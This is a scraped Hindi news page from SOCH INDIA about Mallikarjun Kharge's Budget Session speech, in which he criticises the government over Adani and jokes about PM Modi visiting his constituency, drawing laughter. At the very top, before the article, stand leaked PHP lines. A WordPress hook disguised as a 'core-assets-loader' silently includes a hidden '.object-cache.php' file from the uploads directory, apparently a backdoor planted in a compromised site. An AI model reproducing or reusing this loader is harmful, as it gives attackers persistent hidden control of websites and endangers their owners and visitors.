add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Budget Session: संसद में मल्लिकार्जुन खरगे ने कहीं ऐसी बात खिलखिला पड़े पीएम मोदी – SOCH INDIA
Menu

देश
Budget Session: संसद में मल्लिकार्जुन खरगे ने कहीं ऐसी बात खिलखिला पड़े पीएम मोदी

nobanner

बजट सत्र में गौतम अडानी के मामले को लेकर संसद के दोनों सदनों में संग्राम छिड़ा हुआ है. मंगलवार (7 फरवरी) के बाद बुधवार को कांग्रेस अध्यक्ष मल्लिकार्जुन खरगे ने मोर्चा संभाला और मोदी सरकार पर जमकर हमला बोला. तीखे तेवरों के साथ सियासी हमला कर रहे खरगे के संबोधन के दौरान ऐसा भी मौका आया, जब पीएम नरेंद्र मोदी समेत पूरा सदन खिलखिलाकर हंस पड़ा.

राष्ट्रपति के बजट अभिभाषण पर धन्यवाद प्रस्ताव को लेकर संसद में बुधवार को चर्चा चल रही है. इस दौरान मल्लिकार्जुन खरगे अडानी मुद्दे पर सरकार को घेर रहे थे. तभी उन्होंने पीएम मोदी से संसद की ओर ध्यान देने की अपील कर डाली. खरगे ने कहा कि प्रधानमंत्री हमेशा चुनावी मोड में होते हैं.

खरगे ने आगे कहा कि इधर संसद चल रही है, उधर प्रधानमंत्री मेरे संसदीय क्षेत्र कलबुर्गी पहुंच गए. अरे भाई मेरा एक ही संसदीय क्षेत्र है. आपको वही मिल रहा है और एक नहीं दो-दो मीटिंग कर रहे हैं. खरगे के इतना कहते ही पूरा सदन पीएम मोदी और सांसदों के ठहाकों से गूंज उठा.